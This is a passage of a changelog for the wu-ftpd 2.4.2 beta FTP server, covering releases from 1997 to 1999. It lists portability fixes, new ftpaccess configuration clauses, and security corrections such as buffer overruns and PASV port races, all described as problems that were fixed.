+ o  Sun forgot to include RAND_MAX in their implementation of
+    srand()/rand() on SunOS 4.1.  Choose a (hopefully) correct value.  This
+    has dire consequences for PASV port randomization of it's wrong.
+ o  The Perl script for xferstats provided with the daemon calls for
+    /usr/local/bin/perl when Perl is usually in /usr/bin/perl.  You
+    shouldn't be using this script anyway, get Phil's version; it's MUCH
+    better.
+ o  Corrections to QUOTA support.
+ o  OPIE can now use the OPIE access file, allowing some users to user
+    password authentication while requiring others to use OPIE.
+ o  Wildcards (*) on hostmatch used to work and don't any more.  The were
+    removed because the original method was insecure.  Corrected the
+    problem and re-instituted this feature without the potential security
+    problems of the old method.
+ o  /etc is cluttered enough but the config files make it harder than it
+    has to be to use /etc/ftpd for the daemon configuration files.  Updated
+    config files to test for a value before setting the default.  Look in
+    src/makefiles/Makefile.lnx for an example of how to automatically test
+    the target for this, or just add -DUSE_ETC_FTPD to COPTS in your
+    Makefile.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR14: Released 15 February, 1999
+ o  The correction for SCO had an effect on Digital Unix with C2 Security
+    (SECUREOSF).
+ o  Fixed some dumb coding mistakes in realpath.c
+ o  Port for NextStep 3.3 corrected.
+ o  Fixed a compile error for quotas on Linux; seems Redhat or someone
+    forgot to #include a file deep in the OS runtime headers.
+ o  Corrections for SecureWare systems so the daemon can build on SCO
+    OpenServer 5.
+ o  There were points where multiple replies due to realpath() returning an
+    error could hang the remote client.  Removed the extra replies.
+ o  The size of a buffer used by the *_realpath() functions is BUFSIZ and
+    should be MAXPATHLEN.  Actually, this was the case many places in
+    extensions.c.
+ o  The anti-NOOP code didn't work.  The timer was being restarted too
+    often.
+ o  The reason debug doesn't work in daemon-mode is it's initialized too
+    late.
+ o  Back in VR8 I turned off the sleep slowing down password guessers
+    because there are times when signals can be off when the sleep occurs
+    and that would hang the daemon.  Let's fix that and re-enable the
+    sleep.
+ o  Still more buffer-overflow points which can cause problems.  This time
+    it's in the writing of the xferlog.  Sigh.  This really should be
+    rewritten.
+ o  Disallow PASV connections from IP addresses different than the control
+    connection.  This is not a complete fix, but it will stop connection
+    theft where the attacker is on a different machine than the victim-
+    client.
+ o  There is an old, well-known PASV port race designed into the FTP
+    protocol.  To make it harder for this race to succeed, do not depend
+    upon the underlying system to randomly choose the PASV port.  The only
+    correct solution to this problem is a client-side issue: open the
+    connection before issueing the transfer command.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR13: Released 1 February, 1999
+ o  Added module loadavg.c stripped from Sendmail.  This is not currently
+    compiled.  The module is for testing connection limits based upon
+    system load, which is planned for a future version of the daemon.
+ o  Fixed a bug where access.c was logging garbage because of bad linkage
+    to ftpd.c, this appeared on a number of syslog messages instead of the
+    remote user identification (via RFC 931).
+ o  Added and ftpaccess clause to listen on a single IP address instead of
+    INADDR_ANY.  This is incompatible with virtual host support as things
+    now stand and will require a major rewrite to fix.  I needed it for a
+    specific site and decided to leave it in.  The new clause is:
+        daemonaddress <address>
+ o  Fixed a bug in the 'connection from' message.  The AUTH (RFC 931) was
+    too late and the remote address and host name hadn't been determined
+    yet.
+ o  Fixed a bug in the quota support which caused a crash if there was no
+    file support (/etc/fstab /etc/mtab) on some systems.
+ o  Added documentation for class= phrases missed in VR12 and promised for
+    this release.
+ o  The realpath fix in VR12 for NFS had an off-by-one.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR12: Released 1 January, 1999
+ o  Added a missing library building for SGI.
+ o  Added a few small tweaks for building on NetBSD.
+ o  Added a compile-time option to suppress syslog messages about pid locks
+    forcing a sleep.
+ o  Preload the ftpaccess file before becoming a daemon.  This can have a
+    big impact on the performance for busy sites.  It also loads before the
+    chroot command-line option so the /etc/ftpaccess file does not need to
+    be in the protected area.
+ o  The ftpwho and ftpcount commands internally use ps(1).  Appearently, on
+    at least Linux, there's a move afoot to change the ps(1) command so it
+    no longer accepts dashes on the command-line options.  How annoying.
+    Ah well, if the target is Linux, use ps(1) without dashes to make the
+    silly command shut UP!
+ o  The cleanup in the last patch also cleared up some potential problems
+    with the upload clause.  The daemon is no longer critically sensitive
+    to minor formatting errors on this clause.
+ o  Added 'class=' parameter for noretrieve, allow-retreieve, path-filter,
+    delete, umask, chmod, overwrite, rename and upload clauses.  Cleaned up
+    the functions a bit for readability.
+ o  Port for Digital Unix 4.0(b) corrected.
+ o  Corrected a coding error which prevented proper use of the
+    address:netmask form for access control.
+ o  Corrected problems with NFS and the new realpath code in VR10.  Some
+    problems with several security models and NFS have been corrected.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR11: Released 1 December, 1998
+ o  Corrected a problem with CWD when no parameter is given and the user is
+    anonymous or guest.  The command should work but returns an error
+    instead; the error reveals the underlying file system.  CWD with no
+    parameter should work like CWD ~.
+ o  Correcte problems with the new realpath.c on SunOS.  Basically, the
+    getcwd() function on SunOS is too buggy to use so we had to switch to
+    getwd instead.  SunOS has joined AIX as systems which do not provide
+    the runtime support needed to avoid all buffer overruns in realpath().
+ o  Changed the lslong and lsshort ftpaccess clauses to support more
+    complex command lines.  Added lsplain to modify the default 'ls'
+    behaviour.
+ o  The byte count for ASCII mode file reception was off by a few
+    characters.  This bug had been there for a very long time.
+ o  A bad extern in ftpcmd.y caused garbage to be logged for the
+    remoteident.
+ o  initsetproctitle was once again causing signal 11 crashes.  Moved the
+    call further up yet again and they're not happening.
+ o  Added an option to completely disable PASV mode and/or PORT mode.
+ o  Added syslog message if started as a standalone daemon and there is no
+    ftpaccess file being used.
+ o  Linux libraries now define some paths already in src/pathnames.h so we
+    need to #include <paths.h> first.  Did this in config/config.lnx.
+ o  Linux library includes no longer #define MAXMNTENT so if it's not there
+    #define it in extensions.c until someone has the time to fix this
+    right.
+ o  Added -r option to chroot the daemon during startup.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR10: Released 1 November, 1998
+ o  There was a buffer-overrun in the realpath function.  Imported the
+    FreeBSD realpath() function to correct this error.
+ o  The Perl xferstats wasn't updated to match the new xferlog format with
+    the new completion-code field on the end.
+ o  AUTH (ident) the remote user during login.  Record the results in the
+    syslog.
+ o  RFC-931 (AUTH/IDENT) was finished up.  The log messages now show the
+    RFC-931 user if one is known.
+ o  Support for some Hitachi flavors of Unix was added.
+ o  Major cleanup of build and the makefiles.
+ o  A number of minor fixes, mainly having to do with differences between
+    ANSI/ISO and K&R C.
+ o  Fixed several points of confusion when some things (like size_t) are
+    not the same size as an int.
+ o  Added the -Q command-line option to suppress access to the PID files.
+    NOTE: Without PID files, the limit ftpaccess clause cannot determine
+    the number of users in the given class.
+ o  Added a -p option which allows the port to be specified for the control
+    connection.  Command-line options are also provided to allow both the
+    data and control port numbers to be specified.
+ o  The daemon did not use the correct method to choose the port for the
+    data connection in PORT mode.  The daemon will look up the data port in
+    /etc/services.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR9: Released 15 October, 1998
+ o  Cleaned up a few large, confusing 'if' statements in the code.
+ o  Changed my mind.  Regular expressions don't work well unless there's
+    some way to tell they're there.  Backed out all regular expression
+    matching for file/path names in the ftpaccess file.  This issue will be
+    re-evaluated in a later version.  Globbing still works everywhere it's
+    reasonable to use it.
+ o  Dead code removed.
+ o  Noted a number of places where strcmp was used but strcasecmp would be
+    more appropriate.  This makes the ftpaccess file easier to maintain
+    since small typographical errors won't matter so much any more.
+ o  Added regular expression matching to deny-mail.
+ o  There were reports of errors on AIX with malloc.  Testers confirm
+    problem in send_data().  Working on the supposition that the problem is
+    data alignment: the 'blksize' is off_t and malloc() wants a size_t;
+    added a conversion step which should eliminate the problem.
+ o  Fixed another discrepancy between the ANSI and K&R function
+    definitions.
+ o  Support globbing/wildcards throughout ftpaccess file for file and
+    directory comparisons.
+ o  Added for OPIE (One-time Passwords In Everything).  You will need OPIE
+    libraries installed to use this.  OPIE is available from
+    ftp://ftp.inner.net/pub/opie/opie-2.32.tar.gz
+ o  The extensions for 'absolute' or 'relative' pathname comparison were
+    not case-insensitive.  They should have been.
+ o  Add 'allow-retrieve' to allow retrieval of files which would be denied
+    by earlier 'noretrieve' clauses.  The ftpaccess clause is:
+        allow-retrieve [absolute|relative] [class=<classname>]... [-] <filename> ...
+ o  Support regular expressions in noretrieve.
+ o  Port for Digital Unix with C2 Securuty (SECUREOSF) corrected.
+ o  Allow access control commands to use address/netmask or CIDR.
+ o  Corrected a hostname matching bug.
+ o  Allow host names instead of IP numbers.
+ o  Reduce the number of DNS lookups needed for virtual host support.
+ o  xferlog now indicates success or failure.
+ o  realpath() needs root permissions to prevent errors under certain
+    security models.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR8: Released 1 October, 1998
+ o  AIX complained (rightly so) about several problems with the source
+    which prevented compiling using K&R.
+ o  DEC Unix 3 complains about the function 'main()' having more than two
+    parameters for STRICT ANSI/ISO C compliance.  This warning can be
+    safely ignored.
+ o  Corrected several minor problems and fixed errors in syslog in the
+    support/makefiles/Makefile.dec and src/makefiles/Makefile.dec which
+    prevented bulding on DEC Unix 3.x.
+ o  Added USE_VAR and USE_ETC for IRIX (sgi) configuration.
+ o  Added two more virtual-server features so we can deny anonymous login
+    on a virtual servier and so we can allow specified users to log in even
+    though they're real or chroot'd to another directory.  Also added a
+    feature to deny real, guest or anonymous on the default server.  The
+    new ftpaccess clauses are:
+        virtual <address> private
+        virtual <address> deny <username> [<username> ...]
+        virtual <address> allow <username> [<username> ...]
+        defaultserver private
+        defaultserver deny <username> [<username> ...]
+        defaultserver allow <username> [<username> ...]
+ o  Testing CLOSED_VIRTUAL_SERVER pointed out a bug in user() .. the
+    attempt to sleep to slow down password guessers can't work since
+    signals are off.  The daemon sleeps forever.  This has been there for
+    years.
+ o  Ported to Digital Unix 4.
+ o  If no 'ftp' user existed, the HELP-HACKERS patch failed to send a
+    response which would hang the ftp client.
+ o  BSD auth failures crashed the daemon.  This looks like it's been a
+    long-standing problem.
+ o  An earlier version changed the behavior of the xferlog to always show
+    the full, real path for the file.  This should have been a compile-time
+    option.
+ o  More typos in ftpaccess.5, some mine, some have been there for ages.
+ o  Added the ability to disable all DNS lookups in the daemon.  I've done
+    this as a compile-time option and included a discussion of the risks
+    and benefits in the config.h for the daemon.  Enabling this feature can
+    be a win for busy sites because it can reduce the time required to make
+    a connection as well as eliminate syslog messages caused by bad DNS
+    management at the remote sites.
+ o  Found another undocumented feature.  If the <addrglob> on a 'class' or
+    'deny' clause starts with a slach (/) it names a file which contains
+    any number of additional <addrglob> entries per line and any number of
+    lines.  Updated manpage.
+ o  Add 'greeting' clause to control the amount of information the server
+    gives out on the greeting.  The new ftpaccess clause is:
+        greeting full|brief|terse
+ o  Added 'email' option for the 'virtual' clause so we may set this as
+    well.  The new ftpaccess clause is:
+        virutal <address> email <string>
+ o  Added the restriction that no real users may log in on the virtual
+    server.
+ o  If a guest logs in on the virtual server deny the login unless their
+    chroot point is the virtual server's root.  This restricts guest logins
+    to the site admin and anonymous users.
+ o  Added 'hostname' option for the 'virtual' clause so we may set the name
+    of our multi-homed ftp sites as we can with our default site.  The new
+    ftpaccess clause is:
+        virtual <address> hostname <string>
+ o  Added an ftpaccess clause to limit total connect time.  The new clause
+    is:
+        limit-time {*|anonymous|guest} <minutes>
+ o  Disallow certain email addresses as passwords for anonymous ftp.  The
+    new ftpaccess clause for this is:
+        deny-email <case-insensitive-email-address>
+ o  Fix a bug in the parsing of ftpconversions which I found when I put in
+    the new conversions for checksums.  Turns out this was the same as the
+    bug I fixed in VR4 parsing the ftpgroups file.
+ o  Cleaned up some of the cross-platform user authentication code for
+    SECUREOSF.
+ o  Modify the password cryptography for C2 Digital Unix.
+ o  Moved 'retrieve_is_data' to be always compiled into the code since it
+    was needed for SITE CHECKSUM.
+ o  Add site-exec-max-lines ftpaccess clause.  This clause makes the limit
+    on output lines from SITE EXEC configurable.  The default is a 20-line
+    limit, which was the old compiled-in limit.  The new ftpaccess clause
+    is:
+        site-exec-max-lines <number> [<class> ...]
+ o  Added IGNORE_NOOP as a new compile-time option.  It is now the default.
+ o  Added 'SITE CHECKMETHOD' and 'SITE CHECKSUM'.
+        SITE CHECKMETHOD [CRC|POSIX|MD5|RFC1321]
+        Sets or displays the current check method.  If no parameter is
+        given, displays the current method; otherwise the method is set to
+        the given algorithm.  CRC and POSIX are equivalent and are the
+        output of the GNU cksum(1) utility.  MD5 and RFC1321 are equivalent
+        and are the output of the GNU md5sum(1) utility.  The default check
+        method is RFC1321 (MD5).
+        SITE CHECKSUM [<file>]
+        Calculates the checksum for the named file.  If no file is given,
+        the last file transferred (uploaded or download) is used.  If no
+        file has yet been transferred, reports an error.  The current
+        CHECKMETHOD is used to calculate the checksum.
+        New ftpconversions: .crc and .md5
+        Two new file conversions were added to the example ftpconversion
+        which allow using GET to retrieve the CRC or MD5 checksums for
+        files.
+        NOTE: SITE CHECKSUM requires the installation of two additional
+        programs in the ~ftp/bin directory.   These programs have the same
+        requirements as the external ls(1) program also normally required
+        in that directory.  For systems without these programs, or which
+        require building new copies, the GNU textutils package should be
+        used.  This package is available at ftp://ftp.gnu.org/pub/gnu/ the
+        current version at the time of this writing is
+        textutils-1.22.tar.gz
+###########################################################################
+Changes in 2.4.2-BETA-18-VR7: Released 15 September, 1998
+ o  Transfer limits tesed the wrong values for files uploaded to the
+    server.
+ o  Added several new log messages missed in other versions having to do
+    with filesystem change attempts.
+ o  Extended logging for rejected or denied functions such as delete,
+    rename.
+ o  The QUOTA logic for BSDI doesn't match what's provided by the system.
+ o  My label 'slimy_hack:' appearing just before a '}' causes some
+    compilers to belch.  I guess some are more ANSI/ISO than others.  Made
+    a quick fix which ought to make them shut up until I can rewrite pass()
+    to make the label go away.
+ o  The include for 'mntent.h' isn't needed unless QUOTE_DEVICE is defined.
+    This caused problems on BSDI.  Moving the include to only appear for
+    systems which use QUOTE_DEVICE.
+ o  The HELP_CRACKERS patch was too agressive and, if message files were
+    defined for 'deny' and 'limit' could tickle bugs in ftp clients.  The
+    patch is backed off to drop the connection immedeately if it violates
+    'deny' or 'limit'.
+ o  Extended upload and noretrieve to have an optional parameter which
+    specifies whether the named file/directory is interpreted as an
+    absolute name or relative to the current chroot'd environment.
+ o  Don't respond to *ANY* commands except USER, PASS and QUIT until the
+    remote user logs in successfully.
+ o  Added PARANOID check to deny login if a real user's home directory is
+    bad.  Something's bunged up in /etc/passwd, why trust it?
+ o  Extended logging for rejected and failed login attempts.
+ o  Fixed a bug in popen which can cause segmentation faults.  It's unknown
+    if this is exploitable (it doesn't look like it is to me).  It's been a
+    problem for a long time.
+ o  Fixed a typo in the ftpaccess manpage (What, just one?  Come on!)
+ o  Traffic counters weren't protected by TRANSFER_COUNT in some cases.
+ o  The 'daemon' variable conflicts with a 'daemon()' function in some
+    runtimes.  Renamed.
+ o  Missing <grp.h>.  Gotta love Linux's grab-one-get-it-all method for
+    defining system headers, don't ya?  Grrr.
+ o  DAEMON always includes <sys/termio.h>, it was needed until VR6 removed
+    the attempt to detach from the controlling terminal.
+ o  main() is declared void; that's not ANSI, it's just stupid.
+ o  routevector.c uses ulong instead of u_long.  ulong doesn't exist on
+    many systems.
+ o  defumask caused a data alignment problem on HP-UX 10.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR6: Released 26 August, 1998
+ o  Fixed handling for the message clause so login and cwd= work as
+    expected.
+ o  The daemon responds differently in some cases when it's denying access.
+    This could be used by attackers to determine the validity of some user
+    names on the target system.  NOTE: the 331 response for some systems,
+    notably BSD S/Key or other challenge/response systems, may differ from
+    the 331 response given.  I don't have access to those systems to check
+    out the differences.  If you do, and work out how to hide the access
+    refusal until after the password challenge, please forward it to me.
+ o  The upload clause should use realpath on the home directory to be sure
+    it matches.  Otherwise, real users with /./ in their path will need
+    their upload clause to lexically match the home directory entry in
+    /etc/passwd.  This was not a big issue until I added realuser.
+ o  Fixed a bug with realpath, a missed condition.  If chroot'd to '/' the
+    xferlog shows '//' at the start of the filename.
+ o  Added the ability to force all UID/GID in a range to be treated as
+    guests.  The ftpaccess clause for this are:
+        guestuser <username> [<username> ...]
+        realgroup <groupname> [<groupname> ...]
+        realuser <username> [<username> ...]
+ o  Disallow UIDs and GIDs by numeric range.  This can obviate the need for
+    /etc/ftpusers.  The ftpaccess clauses for this are:
+        deny-uid <uid-range> [...]
+        deny-gid <gid-range> [...]
+        allow-uid <uid-range> [...]
+        allow-gid <gid-range> [...]
+ o  Added 'guest-root' to select directory based upon guest UID.  The new
+    ftpaccess clause is:
+        guest-root <root-dir> [<uid-range>]
+ o  Added 'anonymous-root' to select chroot directory based on class of
+    anonymous user.  The new ftpaccess clause is:
+        anonymous-root <root-dir> [<class>]
+ o  Missed a spot where "*" should be matched for the <root-dir> in an
+    upload clause.
+ o  Fixed a silly bug in the "rename" clause.
+ o  Change the defaults to deny upload, and other site-modification things,
+    for anonymous users.
+ o  Some systems, notably Solaris, have problems with the code the
+    standalone daemon mode used to attempt to detach from the terminal
+    session.  This was in the original patch.  Upon thinking about the
+    problem, I see no reason to keep the code arround.  If you need this
+    feature, use 'nohup' to run the daemon.
+ o  Standalone daemon mode (in VR4) missed including a header.
+ o  Added '-VR6' to version string in newsvers.sh.  This will be updated
+    with all future versions.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR5: Released 15 August, 1998
+ o  Cleaned up some unneeded blank lines sent in responses.
+ o  Added a message to show total traffic counts on the response to QUIT.
+ o  Added file counts, corrected missed bytes, added counts to STAT
+    command.
+ o  Added detail counters and ftpaccess clauses to limit the user's ability
+    to upload/download files based on these.  The new ftpaccess clauses
+    are:
+        byte-limit [<raw>] <in|out|total> <count> [<class>]
+        file-limit [<raw>] <in|out|total> <count> [<class>]
+ o  Restrict throughput for network load management.  The ftpaccess clause
+    for this is:
+        throughput <root-dir> <subdir-glob> <file-glob-list> <bytes-per-second> <bytes-per-second-multiply> <remote- glob-list>
+ o  Added 'tcpwindow' to configure TCP window size for performance
+    tweaking.  The ftpaccess clause is:
+        tcpwindow <size> [<class>]
+ o  Provided address remapping for PASV mode to allow daemon to run behind
+    IP-address translating firewalls (NAT).  If you use this with virtual
+    hosts, let me know how it goes; I think it works, but let me know if it
+    needs extensions for virtual hosts.  The ftpaccess clauses for this
+    are:
+        passive address <externalip> <cidr>
+ o  Limit PASV port ranges.  The ftpaccess clause for this is:
+        passive ports <cidr> <min> <max>
+ o  The original idea for realpath when it was included in the source kit
+    was that it would provide missing functionality on systems where it was
+    missing or replace existing functionality on systems where it was
+    already present.  The VR versions presume the daemon will always use
+    the included realpath function.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR4: Released 30 July, 1998
+ o  Added 'defumask' to specify umask values by class in ftpaccess.  The
+    ftpaccess clause is:
+        defumask <umask> [<class>]
+ o  Added the ability to specifiy groups which have no password.  You'll
+    still need to SITE GPASS, but just send no password.
+ o  Fixed possible bugs if the ftpgroup file is malformed.
+ o  Allow numeric UID and GID values.  On systems with large numbers of
+    users and a large number of upload clauses, the daemon can take a
+    significant period to process the ftpaccess, passwd and group files.
+    Effected ftpaccess clauses include: upload, guestgroup and autogroup.
+ o  The following problems were noted during testing:
+     - Issuing PORT prior to login changes the state of the daemon
+     - Issuing PASV after PORT does not change the mode reported by STAT
+     - Illegal PORT commands change the state of the daemon
+    This turned out to be two problems: PASV mode was being reset by
+    rejected PORT commands, and PASV mode wasn't reseting the state
+    completely after setting up a data connection.
+ o  HELP PORT indicated only 5 bytes were needed.  Six are.
+ o  Added MAPPING_CHDIR config option to support CWD working like cd
+    command in most Unix shells; the PWD shown is the logical path rather
+    than the physical path.
+ o  Added syslog messages for more stuff.  MKD, RMD, CHMOD and RNTO now log
+    as DELE has.
+ o  Added new command-line option to run in standalone daemon mode.  This
+    is a win for busy sites but not the big win it could be if it pre-
+    loaded the ftpaccess file into memory.  Also, at this point, the
+    standalone mode loses the tcpwrappers functionality which is available
+    when running from inetd.
+ o  The mod to realpath for VR3 wasn't complete.  This was mainly visible
+    when logging a deletion message.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR3: Released 15 July, 1998
+ o  Added -w and -W to enable (default, -w) or disable (-W) recording user
+    login and logout for ftp sessions in wtmp.
+ o  Noticing 'guestserver' made me look.  There are two other undocumented
+    ftpaccess clauses: 'lslong' and 'lsshort'.  Man page updated.
+ o  While researching 'nice' came across an undocumented ftpaccess clause
+    'guestserver'.  Man page updated.
+ o  New ftpaccess clause 'nice' to adjust process priorities based upon the
+    class.  The new ftpaccess clause is:
+        nice <nice-delta> [<class>]
+ o  The upload clause is extended to allow '*' for <owner> and <group> so a
+    single upload clause can work for all users.  For example:
+    upload /home/ftp /private/*/incoming* yes * * 640 nodirs
+    can be used to create private upload areas for every user.
+ o  The noretrieve clause is extended to mark entire directories
+    un-gettable.
+ o  The util/xferstats that comes with wu-ftpd 2.4 always produces a count
+    of zero for "Systems Using Archives", because the array whose size is
+    printed ("$systemfiles") never gets anything stored in it.  Verified to
+    exist in the current version.
+ o  The perl script xferstats incorrectly identifies internet addresses
+    whose host name begins with "inf" or which are only 2 components wide
+    (e.g., "bix.com") as unresolved.  I could not verify the "inf" problem,
+    but the 2 component problem has been verified to exist in the current
+    version.
+ o  On the upload clause, 'no' should imply 'nodirs'.  Good grief, how long
+    has this bug been lurking about?  [Ed: Since 2.1!]
+ o  The fixes for the CD ~ problem (ALTERNATE_CD option for beta 18) break
+    a few things.  Most notably, xferlog doesn't include the full name of
+    the file and the upload command doesn't work properly.  In addition, I
+    believe noretrieve should be based on the real file system rather than
+    the chroot'd environment.  The man page says '/' means the name is an
+    'absolute path specification' which I take to mean from the real file
+    system.  Discovered during testing; I had the same problem with my CD ~
+    fix in beta 17 so I was expecting this.
+ o  Makefile.lnx from BETA-18 links the daemon and support programs
+    statically.  The wisdom of this is debatable at best.
+ o  Makefile.lnx from BETA-18 presumes Bison is installed; it isn't always.
+ o  BETA-18 had the default to disable the ALTERNATE_CD fix for the CD ~
+    problem.  It should be enabled.
+ o  Merged 2.4.2-BETA-18 with 2.4.2-BETA-17-VR2.  What a pain; next time I
+    have to be up and ready with CVS!
+###########################################################################
+Changes in 2.4.2-BETA-18: Released 6 July, 1998
+ o  Improve the build process for Solaris.
+ o  The response to the MKD command was not RFC 959 compliant.  A number of
+    responses given by wu-ftpd were not compliant with RFC 959. I have
+    audited this in the software and corrected as many as I can find.
+ o  Make some changes to the installation process for Linux.
+ o  Fixed a case where a variable does not get properly defined if UPLOAD
+    is not defined in config.h.
+ o  Added more information about the impact of  the existance of the
+    shutdown message file to the NOTES file.
+ o  The wrong error message would be returned when a write fails (during a
+    PUT).
+ o  Add "exit(0);" to the end of the ftpshut.c file.
+ o  Permit the daemon to make use of the -A option to /bin/ls when on
+    Solaris 2.
+ o  Log information when a transfer data connection comes from somewhere
+    other than the address of the control connection.
+ o  Made it easier to compile on HP/UX.
+ o  Fixed an "off by one" problem in the "limit" stanza of the ftpaccess
+    file when specific times are specified.
+ o  Linux releases other than RedHat 5.0 running kernels with versions
+    greater than 2.0.31 would not compile properly.
+ o  Solaris 2.5.1 on sparc would not correctly determine if the snprintf
+    family of library routines were to be linked from the C library or from
+    the support library.
+ o  SITE CHMOD would not accept values greater than 777. Now, you can. Just
+    define UNRESTRICTED_CHMOD in the root-level config.h file.
+ o  Port correction for HP/UX.
+ o  wu_logwtmp did not include the username when a logout record is
+    written.
+ o  On SGI, initsetproctitle causes problems. I don't have an SGI to test
+    the fix on, but I have attempted to address it in this release.
+ o  Fixed a problem with the STAT command when in Passive mode.
+ o  The home directory finding routing in glob.c would not return the right
+    stuff when the "/./" convention is used for guest users.
+ o  Port correction for DEC UNIX.
+ o  Made it easier to compile of AIX 4.2.
+ o  _LARGE_FILES should not be defined for AIX 4.2 builds. I have changed
+    the config.h file for aix to do this for AIX 4.2. I don't have AIX, so
+    I don't know if this will work, but it's in there.
+ o  Changed the strategy for using bigcrypt() on C2 Security on Dec OSF/1.
+ o  NO_PRIVATE was not explicitly defined or undefined in config.h.
+ o  Fix a problem in the output of the ftpcount command.
+ o  Fix the "build" script to make it format the error message properly
+    when multiple compile targets are provided.
+ o  Corrected a documentation error in describing the impact chroot has on
+    hard links.
+ o  Address some misplaced or missing calls to alarm(0).
+ o  ftpcmd.y did not have NULL checking in certain places.
+ o  Port corrections for BSD/OS including support for BSD authentication.
+    This should work on FreeBSD as well, but I have not altered the FreeBSD
+    configuration to make use of this.
+ o  ftpcount did not always work correctly due to permissions problems on
+    the login database file that ftpd maintains.
+ o  Fixed problems in the "limit" processing that were introduced in
+    beta-16.
+ o  Fixed some problems with output formatting for ftpwho.
+ o  Added s/key support on NetBSD.
+ o  Addressed the issue concerning what "cd ~" should do.  The alternate
+    behavior can be obtained by defining ALTERNATE_CD in the root-level
+    config.h file.
+ o  Fixed processing of the %U directive when the user is unknown.
+ o  RFC 931 calls would fail due to wu-ftpd failing to bind to the correct
+    address on multi-homed hosts.
+ o  Fixed a problem where ftpd would exit with signal 11.
+ o  Fixed a problem with the handling of standard error messages from
+    programs called during the file conversion process.
+###########################################################################
+Changes in 2.4.2-BETA-17-VR2: Released 3 June, 1998
+ o  Left a debugging statement in for syslogmsg in VR1 patches.
+ o  The fix for CD ~ broke the upload and noretrieve access-control
+    statements and changed what was written to xferlog and the syslog.
+    Well, actually, it didn't break the noretrieve statement, but the man
+    page says '/' means the name is an 'absolute path specification' and I
+    take that to mean relative to the _real_ filesystem, not the chroot'd
+    one.  Discovered when set live on my main server; I really should'a
+    tested with more than one guestgroup.
+###########################################################################
+Changes in 2.4.2-BETA-17-VR1: Released 3 June, 1998
+ o  Shutdown warnings were not given to normal (non-anonymous) users on
+    login.
+ o  Added 'hostname' configuration statement.  Normally the server
+    determines its host name from the system.  This allows the admin to set
+    the name on machines with several names (multihomed) where the default
+    name is not the desired name.  Manpage updated.  The new ftpaccess
+    clause is:
+        hostname <some.host.name>
+ o  Move Linux to use POSIX regex included with the system instead of the
+    routines included with wu-ftpd.  This allows us to define path-filter
+    statements which allow spaces in the pathnames.  For example:
+        path-filter anonymous /etc/pathmsg ^[-A-Za-z0-9_.[:space:]]*$ ^\. ^-
+ o  Somewhere along the way the upload statement was broken.  The fix adds
+    a new parameter to upload so admins can determine the permissions for
+    any new directories permitted.  New features are documented in
+    ftpaccess manpage.
+ o  Add -X command-line option and syslog option to log statement in
+    ftpaccess.  These options eliminate xferlog output and direct transfer
+    logs to syslog instead.  The new ftpaccess clause is:
+        log syslog
+ o  Prevent NOOP resetting idle timer.
+ o  The CD command supports ~<username> but gives errors when just ~ is
+    found.  Note: there are still problems with other commands which may or
+    may not accept tilde-user notation and may or may not understand a
+    tilde by itself means the current user's home directory.  This only
+    effects chroot'd users.
+###########################################################################
+Changes in 2.4.2-BETA-17: Released 10 May, 1998
+ o  Fix the hostacc.c introduced in beta-16. This fixes all the various
+    alloc/free problems in the memory allocation and retains the dynamic
+    feature introduced in beta-16.
+ o  Remove a declaration atol() in ftpcmd.y so that wu-ftpd will compile
+    properly on systems that declare atol as a macro.
+ o  Move "initsetproctitle" from one location in the ftpd.c file to
+    another.  This should fix the problems many people report on some
+    operating systems concerning the use of command line arguements.
+ o  Make a cosmetic fix to change what setproctitle() puts in the line
+    returned when you do a ps from "sendmail:" to "ftpd:". This was a
+    mistake I made when I integrated the new sendmail 8.8.7 proctitle stuff
+    into beta-16.
+###########################################################################
+Changes in 2.4.2-BETA-16: Released 21 December, 1997
+ o  The install shell script (when used on OpenServer 5) does not work
+    correctly.  Also, man pages can be installed and used with either nroff
+    or groff is available. Groff can be obtained for OpenServer 5 from the
+    sco web site. So, man pages will now be installed on SCO.
+ o  Fix some memory leaks.
+ o  off_t is a long long on AIX 4.2. I have attempted to compensate for
+    this in ftpd.c, but I don't have an AIX system to test on, so it may
+    not work. This affects places where wu-ftpd wants to print the size of
+    files or the size of transfers.
+ o  There is a long standing problem in the code that does port checking.
+    This bug makes it possible to exploit priviledged ports on the host
+    system or the client system (but not other systems).
+ o  Fix a bug in the gzip2cmp utility.
+ o  Added a number of small fixes to make it easier to compile on AIX.
+ o  Prevent some systems from faulting when they encounter a null pointer
+    in ftpcmd.y. Many systems already handle this, but some don't and this
+    will insure that those are covered as well.
+ o  Correct for differences between SecureWare on Digital Unix 3.2 and
+    Digital Unix 4.0.
+ o  A number of porting issues for SVR4-derived systems and Solaris 2.
+    These are mainly centered around support for utmp/wtmp entries.
+ o  There were spaces where there should be tabs in the Makefiles for OSF.
+ o  Add -D_NO_PROTO to CFLAGS in the AIX Makefiles.
+ o  The man pages should be installed mode 644 (not 755).
+ o  Fix a number of errors in the implementation of the reply routines,
+    especially when vprintf is not available.
+ o  Add a NOTE that the compiler which comes with HP/UX won't work.
+ o  HP/UX now builds with VIRTUAL as the default.
+ o  The man page for the daemon be installed as ftpd.1m instead of
+    in.ftpd.1m for systems where section 1m is correct.
+ o  Reevaluate guestgroup after autogroup.
+ o  Dynamically allocate the ftphosts file in memory; removing the limit of
+    100 hosts.
+ o  wu-ftpd can hang in in "read" forever.
+ o  Fix conflicts between some subroutine names (getline and logwtmp) in
+    wu-ftpd and functions in glibc2.
+ o  Fix a problem which can come up with strings which are not properly NUL
+    terminated.
+ o  Add a comment in NOTES that for versions of Digital Unix without C2,
+    you have to undef SECUREOSF in the config file for Digital Unix.
+ o  Porting correction for AIX; some minor code cleanups.
+ o  Correct building the support library under Solaris 2  to prevent ld
+    from getting upset.
+ o  In ftpcount make sure the numbers listed are no lower than zero.
+ o  Correct S/KEY support for FreeBSD.
+###########################################################################
+Changes in 2.4.2-BETA-15: Released 12 September, 1997
+ o  Correct a problem in the "NLST" command that could cause a system to
+    eat up all memory and get sluggish. This could be seen as a Denial of
+    Service attack.  I have changed the software to detect this type of
+    attack and not permit it.
+ o  The s/key challange in wu-ftpd did not conform to RFC 1760.
